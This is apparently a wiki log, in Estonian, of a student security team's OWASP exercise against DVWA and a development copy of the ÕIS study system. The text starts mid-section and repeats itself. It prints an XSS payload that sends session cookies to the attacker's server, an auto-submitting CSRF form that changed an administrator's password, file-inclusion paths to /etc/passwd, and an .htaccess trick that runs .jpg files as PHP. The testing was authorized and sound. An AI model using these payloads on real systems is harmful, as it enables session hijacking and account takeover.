Payload'i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.
Ründe stiiliks määrata Pitchfork.
Mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.
Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.
Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -> Start Attack, mis siis alustas rünnet.
Kahjuks ka see rünne ei toiminud teadmata põhjusel.
Proovitud sai ka lühemate nimekirjadega ja edutult.

Peale teise programmi kasutamist jõudsime järeldusele, et Brute Force ründest pole meil kasu ja ei aita eesmärki täita effektiivselt.
Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5-ks sisselogimine ära vastava teatega ja brute force programmidele ei tule vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.

Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.

==== CSRF - Cross-site request forgery ====
Katsetamine toimub koos Taaviga.

Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.

Katse eesmärgiks on DVWA-s kasutaja parooli muutmine, niiet ta ise paneb meie veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse see koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.

Lõime uue faili - crosssite.txt

DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.
Võtsime lehe Source Code lahti
Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.
Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.
Current Password lahtri jätsime samaks.
Ülejäänud kahe uue passwordi fieldi type'iks määrasime "Hidden" ja value'deks "admin".
Salvestasime faili ja käivitasime selle.
Tuli ette ainult lahter Current Passwordi ja Submit nupuga.
Panime sisse tolle hetke parooli ning saatsime teele päringu ning saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud sõna ".

Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.

=== Taavi tegevus ===

Backtrack 5 R2 - parimate tööriistade ja meetodite uurimine et leida turvanõrkusi.

=== Matise tegevus ===
==== Reflected Cross Site Scripting (XSS) ====
<ul>
<li>Lehel on selline Form:</li>
[[Image:Xsstesting.jpg|Location="left"|Caption|]]
<br>Form väljastab : Hello „sisestatud nimi“
<li>Easy puhul:</li>
<li>Saab sisestada textboxi skripti:</li>
<script>
alert(document.cookie.match(/PHPSESSID=[^;\]+/));
</script>
<li>Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.</li>
<li>Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: </li>
<script>
this.document.location.href = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);
</script>
<li>Saab kohe enda veebiserveri logidest näha Session ID’d.
<br>Näide logist:</li>
/var/log/apache2/access.log
127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] "GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1" 404 404 "-" <br> "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11"
<li>Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.</li>
</ul>

=== Sanderi tegevus ===
[[File:DVWA_upload.png|150px|thumb|DVWA Upload]]

SamuraiWTF kasutamine testimiseks: DVWA (Damn Vulnerable Web Application).
==== Faili üleslaadimine: madal tase ====
<ul>
<li><b>DVWA Security</b> määrata: Low -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess</li>
Üleslaetavasse *.php faili saab kirjutada php koodi:
<?php var_dump($_REQUEST, $_SERVER); ?>
<li>Minnes üleslaetava *.php faili asukohta veebilehitsejas http://dvwa/hackable/uploads/*.php käivitatakse skript ja tagastatakse kõik küsitav:</li>
esimeses massiivis "PHPSESSID" ("2b1ae19446cfde009664f18df51b6ec1") ja turvatase "security" ("low");
teises "HTTP_COOKIE", milles on eelnevadki andmed; asukoht "PATH", "SERVER_SOFTWARE", "SERVER_NAME",
"SERVER_ADDR" ("127.42.84.1"), "SERVER_PORT" ("80"), "REMOTE_ADDR" ("127.42.84.1"), "REMOTE_PORT" ("53425") jpm.
</ul>

==== Faili üleslaadimine: keskmine tase ====
<ul>
<li><b>DVWA Security</b> määrata: Medium -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida ei saa näiteks järgnevates formaatides faile:</li>
.htaccess
.php .html .pdf
.gif .png .bmp
.svg .swf
.tif .tiff .exif
.raw .cgm
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
<li>Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:</li>
http://dvwa/hackable/uploads/*.jpg
<li>Skripti käivitamiseks tuleb kasutada "?page=" ja faili asukoht:</li>
http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg
Kuvatakse php skripti tulemus.
Kommentaar: "?page=" kasutamine võetud menüüvalikust: <b>File Inclusion</b>
<li>"?page=" abil saab vaadata kasutajate nimesid:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd
<li>Paroole vaadata ei saa, selleks õigused puuduvad:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow
</ul>

==== Faili üleslaadimine: kõrge tase ====
<ul>
<li><b>DVWA Security</b> määrata: High -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.</li>
<li>Skripti käivitamiseks ei piisa ka "?page=" kasutamisest. Igal juhul on vastus selline:</li>
ERROR: File not found!
<li>Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:</li>
http://www.motobit.com/util/base64-decoder-encoder.asp
<li>Moodustades loodud faili asukohast kood ja kasutades</li>
data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:
http://dvwa/hackable/uploads/*.jpg
</ul>

== 3. päev ==

=== Alo tegevus ===
Lihtsalt url modifitseerimisega leidsime mittekaitstud lingi:

Õppesoorituste all on võimalik laadida alla kõikide kasutajate õpingukaardid (lihtsalt tuleb otsida üles soovitud kasutaja student_id)
Arvete alt peaks ka võimalik sama viga ära kasutada, aga kuna ühtegi arvet hetkel süsteemis polnud ei olnud võimalik seda viga kinnitada.

=== Urmo tegevus ===
====Subgraph Vega ====
Subgraph Vega on beeta staadiumis olev vabavaraline veebiapplikatsioni nõrkuste skänner, proxy ja platvorm.
Selle tööriistaga annab välja otsida SQL injectionit võimaldavad kohad, Cross-Site-Scriptingut, URL injection jne võimaldavaid nõrkusi veebilehel.
Programm on Java põhine graafilise liidesega ja töötab Linux'i, OS X ja Windowsi peal.

[[File:Screenshot_vega1.png|200px|thumb|right|Subgraph Vega screenshot]]
Päeva alguses sai hakatud katsetama seda ÕISi arenduskeskkonna peal.

Alustasime uut skänni (Start New Scan).
Küsitakse URI, milleks andsime https://itcollege.dev.ois.ee ja Next.

Järgnevalt on vaja anda kätte sisselogitud kasutaja cookie ja vajadusel lisada kindlate linkide välistamise regullaar avaldised.

Me lisasime ainult küpsise (cookie) sisu:
<pre>
itcollege_OIS_SESSION_ID=sellecookiesisu1234563221
</pre>
ning Finish.

[[File:Screenshot_vega2.png|200px|thumb|right|Subgraph Vega screenshot ühe leitud nõrkusega]]
Järgnevalt ta hakkab skännima ette antud veebilehte ja kui küpsise info ning aadress on õige, siis ta suudab sisselogimisest mööda saada ilusti ja saab uurima hakata, kus võimalikud vead võivad olla. Tegutsemine võttis suhteliselt kaua aega (u. 30minutit).

Katkestasime skännimise ära, kui ta oli umbes 15000 objektist ära skänninud umbes 12000.

Selleks ajaks oli Vega leidnud kõrgema tasemega Cross Site Script'ingu nõrkusi 58, keskmise tasemega Absolute Path nõrkusi 2, ja lihtsalt informatsiooniks 6 tühja element Body nõrkust.

Uurides leitud Cross Site Scriptingu leitud nõrkusi, saime aru, et tegu on selliste aadressitega, milles veebilehed kasutavad aadressirealt saadud ID'sid ja parameetreid ära oma pealkirjades.
Õnneks parameetritega väljad olid veebilehel korralikult ära escape'itud ja saniteeritud, et suhteliselt võimatu oli saada mõnda scripti sinna sisse panna, et veebileht midagi teistmoodi teeks.

ID väljade osas aga ei olnud kaitstud üks link, mille avastas Alo ennem mind.

==== Wapiti ====
Proovisime ära ka Backtrack 5 R2 tööriista Wapiti.
(Koduleht: http://wapiti.sourceforge.net/)

Kahjuks ei saanud seda tööriista kasutada dev-ÕISi pihta, kuna see tööriist ei osanud HTTPS'iga midagi teha.

==== CSRF käsitsi rünne HTML/PHP/JAVASCRIPTiga====
=====1. katse - ÕISi keskkkonna keelevahetus =====
[[File:Keeleseaded.png|thumb|200px|right|ÕISi keeleseadete menüü]]

Päeva esimeses pooles sai avastatud, et dev-ÕISi kasutaja keskkonna keelt saab muuta, kui mõnelt väliselt veebilehelt saata vastav POST päring lingile, mis muudab keelte seadistust.

Võtsime dev-ÕIS'i Source Code'ist välja vastava formi osa ja panime eraldi html faili.
Koristasime mittevajaliku disaini koodi juurest ära.
Muutsime form'i action väärtust pannes olemasoleva ette https://itcollege.dev.ois.ee/ osa ehk oleks absoluutne aadress relatiivse asemel.
Teises fieldis, kus oli vaja määrata keele tähistus, mida saadetaks, panime väärtuseks "en" ehk inglise keelne keskkond tekiks.
Panime koodi enose veebiserverisse üles nimega ois.html.

Faili sisu:
<source lang="html4strict">
<form id="settingsForm" method="post" action="https://itcollege.dev.ois.ee/setting/edit?user_id=2198"
enctype="application/x-www-form-urlencoded">
<input type="hidden" AUTOCOMPLETE="off" name="default_language"value="en">
<br>
<input type="submit" value="Salvesta seaded" name="Savesettings">
</form>
</source>
Panime faili enda arvutis käima, tekkis vastav form ette, kus submit pannes päring jõudis õisi ja muudeti kogeselt ära keskkonna kasutaja keel.

Katsetas koodi enda konto peal Taavi.

=====2. katse - ÕIS'i kasutaja parooli muutmine =====

[[File:Salasona_ois.PNG|200px|thumb|right|Dev_OIS salasõna muutmisvorm]]
Otsustasime proovida, kas CSRF nõrkust annaks ära kasutada ka ÕISi administraatori pettes, kui saata talle pildi link, kus tegelikult taga jookseb HTML/JAVASCRIPT koos, mis saadab POST päringu salasõna muutmisega. Selle toimiseks oli eelduseks see, et rünnatav on ründamise hetkel juba dev-ÕISi sisselogitud.

Selle jaoks uurisime välja, kus asub dev-ÕIS'i kasutaja salasõna muutmise vorm ja kuhu saadetakse vormi sisu.
Vormilt võtsime lähtekoodist (Source Code) vastava koodi välja ja panime eraldi php faili.

Muutsime password ja password_check lahtrite väärtused järgnevaks: "test123" ehk kasutaja uus parool peale rünnakut.

Lahtrites muutsime user_id'd sisaldavad väärtused rünnatava kasutaja user_id vastu, mille saab kätte tudengite/vilistlaste/õppejõudude piltide aadressidelt kätte.

Kõik vormi lahtrite tüübid määrasime peidetud ehk "hidden", et poleks midagi näidata.

Kuna parooli muutmise formil on küljes ka continue parameeter, mis näitab seda, kuhu kasutaja viiakse peale parooli muutmist.
Selle muutsime väljalogimise lingiks, et peale POST päringu tegemist suunatakse kasutaja väljalogimise lehele.
Sellisel juhul ei tule ette teadet, et parooli just muudeti kuskil ja kasutaja enam ei saa oma vana parooliga sisse logida.

Lisasime CSS koodi Submit nupu ära peitmiseks.
JavaScript koodi, et kui leht on laetud, siis automaatselt vajutataks seda nähtamatut Submit nuppu, et brauser saadaks HTML POST päringu ÕISi poole teele.

Salvestasime faili ära kui "screen1.jpg" fail. Ohver arvab, et tegu on pildiga, kui saadame lingi ja seda veel usaldusväärse aadressi pealt.
Tegelikult kasutaja ei näe praegu ühtegi pilti ja suunatakse edasi.

Faili sisu:
<source lang="html4strict">
<html>
<head>
<style type="text/css">
#Setpassword{ width: 0px; height: 0px; border: none; padding: 0; margin: 0; }
</style>
</head>
<body>
<body onload="document.forms.setPasswordForm.submit();">
<form name="setPasswordForm" id="setPasswordForm"
action="https://itcollegedev.ois.ee/et/user/set-own-password?user_id=2227&continue=/auth/logout"
method="post">
<input type="hidden" name="user_id" value="2227" id="user_id" />
<input type="hidden" name="continue" value="%2Fet%2Fsetting%3Fuser_id%3D2227" id="continue" />
<input type="hidden" name="password" id="password" value="test123" />
<input type="hidden" name="password_check" id="password_check" value="test123" />
<input type="submit" name="Setpassword" id="Setpassword" value="Muuda salasõna" />
</form>
</body>
</html>
</source>

[[File:Admin_proof.PNG|200px|thumb|right|Ligisaadud adminpaneelile]]

Tegime uue faili htaccess.txt, kuhu panime kirja käsu, mis käivitaks php ja jpg faile kui php failidena.
<pre>
AddType application/x-httpd-php .php .jpg
</pre>

Laadisime mõlemad failid Enose veebiserverisse avalikult.

Tegime enda kontode peal katsed, et kõik toimiks nii nagu vaja ja ega probleeme ei teki.
Peale seda juhendaja Mart Manguse abiga saime ÕISi adminnile Valter Kunglale väikese test-rünnaku teha.
Mart Mangus üritas seletada, et hinnetelehel on midagi viga ja palus, et Valter vaataks asja üle.
Sellega saavutasime selle, et Valter logis dev-ÕISi sisse oma kontoga.
Valter ütles, et ta ei näe midagi viltu ja selle peale saatsime talle nii nimetatud screenshoti, mille taga oli tegelt meie koodiga screen1.jpg fail.
Kui see fail käivitati, siis Valter Kungla parool muudeti ära ja logiti süsteemist välja.
Tol hetkel, täpselt ennem väljalogimist ja ümbersuunamist, muutus tema parool meie pantud "test123"-ks ja me saime ligipääsu administraatori õigustes kontole.
Rünnak oli edukas.
[[File:Pass fixed.PNG|200px|thumb|right|Dev_OIS fixed]]

Andsime teada Valterile teada, et tegelikult tegime salajase ründe.
Suhteliselt koheselt oli Valteril see CSRF ründe vastu dev-ÕIS ära parandatud, kuna tal oli juba koodiparandus olemas aga lihtsalt rakendamata ja me tabasime ajaliselt viimase hetke ära, kus seda rünnet sai teha.
Peale parandust enam see rünne läbi ei läinud ja süsteem hõiskab vastu, et tegu on ründe või mõne bug'iga.

Kuna tegu oli ÕIS'i arendusversiooniga, siis oli serveris oli lubatud ka error_reporting, mis annab välja ka pildil oleva errorite jada.
Error Reporting on maha keeratud Live keskkonnas ja seal sellist pikka keerulist koodijada veateadetega ette ei tule ning saadetakse teade arendajatele automaatselt.

=== Taavi tegevus ===
===Burp suite===

Esimese asjane peale Burp suite käivitamist. Tabilt proxy ->intercept ->intercept off<br>
Järgnevalt seadistada proxy enda veebiprauserist (mõistlik panna localhost aadress 127.0.0.1 port 8080 ning lülitada sisse ka ssl proxy)<br>
Proxy -> options alt lülitada sisse proxy listner pordile 8080 .<br>
Ohvri valimine <br>
Valida intruder -> target ning sinna sisestada veebileht mida on plaanis uurida https lehe korral lülitada sisse ssl ning pordiks valida 443.<br>
Kui on tarvis lehte ka sisse logituna uurida siis tuleb seadistada järgmised parameetrid.<br>
Valida Options tab sealt sisse lülitada www authentication ning täita all olevad read.<br>site mida rünnatakse tema tüüp(üldiselt basic), login, parool ning valida add.
Kui on soov sooritada veebilehe sipderingi siis tuleb excludida ka logout käsud.<br>
Targer->scope -> exclude frome scope ja veenduda at välja on arvatud logout laused.<br>
Spideringi sisselülitamine <br>
Valida tab Spide ning sealt panna linnuke kasti spider running.<br>
Ning oledki valmis saama laheküljelt infot.<br>
Tööriistal on veel tohutu hulk seadistus võimalusi, aga kahjuks ajanappuse tõttu ei jõudnud nende kõikidega tutvuda.<br>
Tööriis ei ole mõeldud algajatele, kuid teda tundma õppides on võimailik sooritada keerukaid operatsioone. Suurim nõrkus sellel programmil on see, et ta otsing ei näita ära nõrkasid kohti veebilehel vaid need tuleb ise koodist ülesse otsida.

==Nessuse algkäivitamine==
Valida backtrackist vulnerability scannerite alt nessus ning edasi nessus register .<br> Täite ära vajalikud read veebilehel ning mailile saadetakse aktiveerimis kood.<br> Järgnevalt avada termnal ning sisestada käsk : /opt/nessus/bin/nessus –fetch –register **********(tärnide asemele meilile saadetud kood)<br>
Nüüd läheb aega kuni nessus updatedakse (ole valmis ootama võtab tükk aega.)<br>
Järgnevalt käivitada nessus user add ning sinna sisestada soovitav kasutajanimi nessusele, kui küsitakse kas admin konto siis sisestada y. Kõik on korras kui tuleb ette kiri user added.<br>
Järgnevalt valida nessus start.<br>
Et nessusesse siseneda veebibrauseri URL i kirjutada 127.0.0.1:8834
Siis avaneb leht kus tuleb vajutada lehe alaosas olevale lingile mis suunab https leheküljele.<br>
Antud tööriist ei ole just kõige sobilikum veebilehtede testimiseks.

=== Matise tegevus ===

=== Sanderi tegevus ===
[[File:W3af skanner.png|150px|thumb|w3af skänni seaded]]
Backtarcki keskkonnas sai testitud programmi w3af.

==== Backtrack: w3af ====
[[File:Basic HTTP Auth.png|150px|thumb|w3af Basic HTTP Auth]]
[[File:ÕISi küpsis.png|150px|thumb|Mozilla Firefox küpsis]]
[[File:W3af_Cookie.png|150px|thumb|w3af Cookie]]
Võimalik kätte saada SSL Certificate.
Aadressiribalt leitud sisselogimis-aadressiga sisse logimine ei õnnestunud:
https://itcollege.dev.ois.ee/auth/login?continue=/auth/login?
username=<font color="red">KASUTAJANIMI</font>&continue=&Login=Logi sisse&pw=<font color="red">PAROOL</font>
Programmi sisestatud andmetega ka mitte:
Configuration -> HTTP Config -> Basic HTTP Authentication:
basicAuthUser: <font color="red">KASUTAJANIMI</font>
basicAuthPass: <font color="red">PAROOL</font>
basicAuthDomain: http://itcollege.dev.ois.ee
Mozilla Firefoxi küpsis õnnestus luua Töölauale hetkel sisse logitud sessiooni ID-ga. Programmi küpsise sisestamine:
Configuration -> HTTP Config -> Cookies
cookieJarFile: /root/Desktop/<font color="red">ois_cookie.txt</font>
Seda loodud sessiooni ID-ga küpsist kasutada algul ei õnnestunud. Ilmselt oli midagi valesti. Õige on:
# Netscape HTTP Cookie File
.dev.ois.ee TRUE / FALSE 1731510001 itcollege_OIS_SESSION_ID <font color="red">870aqllryuw3cmf6cv8ellha03</font>
Esimene rida on nõutav! Teiste tähendused:
domain - The domain that created and that can read the variable.
flag - A TRUE/FALSE value indicating if all machines within a given domain can access the variable.
This value is set automatically by the browser, depending on the value you set for domain.
path - The path within the domain that the variable is valid for.
secure - A TRUE/FALSE value indicating if a secure connection with the domain is needed to access the variable.
expiration - The UNIX time that the variable will expire on.
name - The name of the variable.
value - The value of the variable.
Küpsis on leitav Mozilla Firefoxis peale itcollege.dev.ois.ee-s oma kasutajaga sisse logimist:
Edit -> Preferences -> Privacy -> History -> remove individual cookies
Search: itcollege.dev.ois.ee
Leitud valiku all Cookie Name: itcollege_OIS_SESSION_ID

Skänneerimine:
<ul>
<li>The page language is: en</li>
<li>The URL: "https://itcollege.dev.ois.ee/" has a "<form>" element with auto-complete enabled.</li>
<li>A comment with the string "<p>tunne end kui koolis</p>" was found in: "https://itcollege.dev.ois.ee/".</li>
<li>Found a form login. The action of the form is: "https://itcollege.dev.ois.ee/auth/login".</li>
The username field to be used is: "username".
The password field to be used is: "pw".
<li><font color="red">Found authentication credentials to: "https://itcollege.dev.ois.ee/auth/login". A correct user and password combination is: Administrador/6666666</font></li>
Antud kasutaja ja parooliga sisse ei saanud.
<li>The URL: "https://itcollege.dev.ois.ee/" returned a response that may contain a "SHA1" hash. The hash is: "c7b39896de5f296b5a44c2dfcd9f0600b2cf424d". This is uncommon and requires human verification.</li>
Taolisi ja MD5 hashiga ridu leiti 355. Kõik vajavad inimese kontrolli.
<li>The URL: "https://itcollege.dev.ois.ee/" sent these cookies:</li>
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; path=/
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; Path=/
<li>The SMTP settings in emailReport plugin seem to be incorrect. Original error: "[Errno 111] Connection refused".</li>
Kui tuleb see veateade, siis skänn katkeb.
<li><font color="red">The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):</font></li>
The URL: https://itcollege.dev.ois.ee/auth/openid-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
The URL: https://itcollege.dev.ois.ee/auth/id-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
<li><font color="red">SQL injection in a Unknown database was found at: "https://itcollege.dev.ois.ee/auth/login", using HTTP method POST.</font></li>
The sent post-data was: "username=John8212&security_key_sis_global=d'z"0&Login=Logi%20sisse&continue=56&pw=FrAmE30.".
The modified parameter was "security_key_sis_global". This vulnerability was found in the request with id 390.
<li>Leidis ka otsirobotitele mõeldud faili: https://itcollege.dev.ois.ee/robots.txt</li>
User-agent: *
Disallow: /
Allow: /curriculum
Allow: /subject
Allow: /diploma
Allow: /schedule/ical
</ul>

== 4. päev - Presentatsiooni tegemine ja esitlemine ==

Koostasime presentatsiooni ja esitlemine.

[[Media:Security_team_presentation.ppt]]

== Tegijad ==
Alo Konno<br>
Urmo Lihten<br>
Taavi Podžuks<br>
Matis Alliksoo<br>
Sander Saarm

Security team

2012-03-30T09:29:26Z

Ulihten: /* Security Team tegevusplaan */

== 1. päev - Materjalidga tutvumine ==

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

A1: Injection - Urmo
A2: Cross-Site Scripting (XSS) - Alo
A3: Broken Authentication and Session Management - Sander
A4: Insecure Direct Object References - Alo
A5: Cross-Site Request Forgery (CSRF) - Taavi
A6: Security Misconfiguration - Matis
A7: Insecure Cryptographic Storage - Matis
A8: Failure to Restrict URL Access - Urmo
A9: Insufficient Transport Layer Protection - Taavi
A10: Unvalidated Redirects and Forwards - Sander

Sanderi konspekt: [[Media:Ois_materjal.pdf]] <br>
Urmo esitlus: [[Media:Injection-Failure_URL_access.ppt]]

== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==
===Security Team tegevusplaan===
1. Päev
1.1 Tutvuda OWASP’iga.
1.2 Tutvuda OWASP’i aasta 2010 TOP 10 veebirakenduse turvariskidega.
1.3 Iga grupiliige teeb 2 turvariski kohta väikese tutvustava ettekande.
2. Päev
2.1 Esitada tiimi tegevusplaan.
2.2 Tutvuda turvariskidega natuke põhjalikumalt.
2.3 Tutvuda ja katsetada erinevaid pen-testingu tööriistasid – BackTrack ja SamuraiCD võimalused.
2.4 Täiendada esimese päeva ettekannet.
3. Päev
3.1 Alustada dev-ÕISi peal turvariskide leidmist – samuti iga grupi liige testib/katsetab 2 turvariski ekspluateerimist.
3.2 Saadud tulemuste dokumenteerimine.
4. Päev
4.1 Saadud tulemuste esitlemine ettekandega
5. Päev
5.1 Tulemuste parandamine wiki’s.

=== Alo tegevus ===

http://www.acunetix.com/support/vulnerability-checks.htm
http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting
http://wiki.developerforce.com/page/Secure_Coding_Cross_Site_Scripting
http://www.youtube.com/watch?v=SG1cvGQ971g
http://www.isecom.org/research.html
http://evuln.com/tools/
http://sectools.org/tag/web-scanners/
http://www.webresourcesdepot.com/10-free-web-application-security-testing-tools/
http://www.acunetix.com/vulnerability-scanner/getting-started.htm

Internetist sai otsitud parimat Windowsi automaatskännerit ja selleks osutus:
Acunetix Web Vulnerability Scanner v. 8
http://www.acunetix.com/vulnerability-scanner/

Pärast programmi installimist tuli seadistada skännimine, valisime keskmie põhjalikkusega skänni.
Erinevalt teistest automaatskännidest sai sellel lihtsamalt seadistatud sisselogimine ja lisaks sai paika panna ka, et ta arvestaks välja Log out lingi.
Antud programm võimaldab skännida:
Cross-Site Scripting (XSS)
SQL Injection (blind test)
File inclusion
Code Execution
LDAP Injection
Cross Frame Scripting
SQL Injection (error msg. test)
CRLF Injection
Directory Travelsal
XPath Injection
URL Redirection
Application Error Message

Kuna skänner skännib väga põhjalikult ja teskeskonnal ei töötanud täsvõimsusel oli ping väga suur ja skänn tegi vähe päringuid tunnis siis oleks täisskänni ajaliselt paar päeva.

=== Urmo tegevus ===

Kasutan BackTrack 5 R2 64bit Gnome ja Samurai CD 0.9.9 operatsioonisüsteeme katsetamaks ja uurimaks erinevate veebilehtede turvariskide ära kasutamist.

Pandud tööle Samurai ja kasutatud Damm Vurnelable Web Application'i.

==== Brute Force (DVWA) ====
Käsitsi välja uuritud login andmed:
kasutajanimi: admin
parool: password

===== Fireforce plugin Firefoxis =====
Tekitatud sai ka password list faili pass.txt.

Kasutusel oli Firefox brauser, kuhu installisime plugin'a Fireforce.
Siin kasutasime Youtube õpetust: http://youtu.be/lmgMXhM01fY .

Panime kasutajanimeks "admin" ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.
Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud.
Selleks sai sõna "incorrect".
Määrata ära tuli ka, et mitu päringut sekundis tehakse.
Panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada.
Päringute tegemise kiirus vähem kui 1 päring/sekundis.

Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.
Kasutasime ka videos näidatud "@ DICTIONARY" teksti ühes lahtris ja siis plugin ei tahtnud üldse proovida ja lasi kõik katsed üle mingil põhjusel.

Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.

===== Burpsuite v1.4 =====
Burpsuite v1.4 on Samurai WTF'il olemas juba sees ja saab kohe käima panna.
[[File:Bp2naide.jpg|200px|thumb|right|BurpSuite näidis screenshot UI'st]]

Programm on juba loomult keerulisem.
Burpsuite'iga tuleb panna käima proxy server localhost'is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.
Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine.
Läbi proxy serveri tuleb BurpSuite'ile kohale vastava veebilehe Header sisselogimise kohta.
Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.
Payload'i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.
Ründe stiiliks määrata Pitchfork.
Mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.
Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.
Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -> Start Attack, mis siis alustas rünnet.
Kahjuks ka see rünne ei toiminud teadmata põhjusel.
Proovitud sai ka lühemate nimekirjadega ja edutult.

Peale teise programmi kasutamist jõudsime järeldusele, et Brute Force ründest pole meil kasu ja ei aita eesmärki täita effektiivselt.
Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5-ks sisselogimine ära vastava teatega ja brute force programmidele ei tule vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.

Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.

==== CSRF - Cross-site request forgery ====
Katsetamine toimub koos Taaviga.

Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.

Katse eesmärgiks on DVWA-s kasutaja parooli muutmine, niiet ta ise paneb meie veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse see koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.

Lõime uue faili - crosssite.txt

DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.
Võtsime lehe Source Code lahti
Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.
Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.
Current Password lahtri jätsime samaks.
Ülejäänud kahe uue passwordi fieldi type'iks määrasime "Hidden" ja value'deks "admin".
Salvestasime faili ja käivitasime selle.
Tuli ette ainult lahter Current Passwordi ja Submit nupuga.
Panime sisse tolle hetke parooli ning saatsime teele päringu ning saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud sõna ".

Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.

=== Taavi tegevus ===

Backtrack 5 R2 - parimate tööriistade ja meetodite uurimine et leida turvanõrkusi.

=== Matise tegevus ===
==== Reflected Cross Site Scripting (XSS) ====
<ul>
<li>Lehel on selline Form:</li>
[[Image:Xsstesting.jpg|Location="left"|Caption|]]
<br>Form väljastab : Hello „sisestatud nimi“
<li>Easy puhul:</li>
<li>Saab sisestada textboxi skripti:</li>
<script>
alert(document.cookie.match(/PHPSESSID=[^;\]+/));
</script>
<li>Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.</li>
<li>Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: </li>
<script>
